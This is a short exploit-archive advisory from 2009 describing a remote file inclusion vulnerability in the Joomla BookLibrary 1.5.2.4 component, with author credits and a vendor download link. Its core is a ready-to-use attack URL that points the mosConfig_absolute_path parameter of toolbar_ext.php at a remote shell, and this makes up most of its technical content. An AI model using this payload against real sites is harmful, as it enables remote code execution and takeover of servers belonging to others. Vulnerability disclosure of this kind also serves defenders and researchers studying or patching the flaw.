[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component BookLibrary 1.5.2.4 Remote File Inclusion Vuln
# Published : 2009-06-09
# Author : xoron
# Previous Title : Open Biller 0.1 (username) Blind SQL Injection Exploit
# Next Title : Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability


=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

  Joomla com_booklibrary_1.5.2.4 Remote File Include

  Download: http://ordasoft.com/Download-document/3-BookLibrary-1.5.2.4-Basic.html

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
          -> .../com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=shell?

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, VoLkan

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

# www.Syue.com [2009-06-09]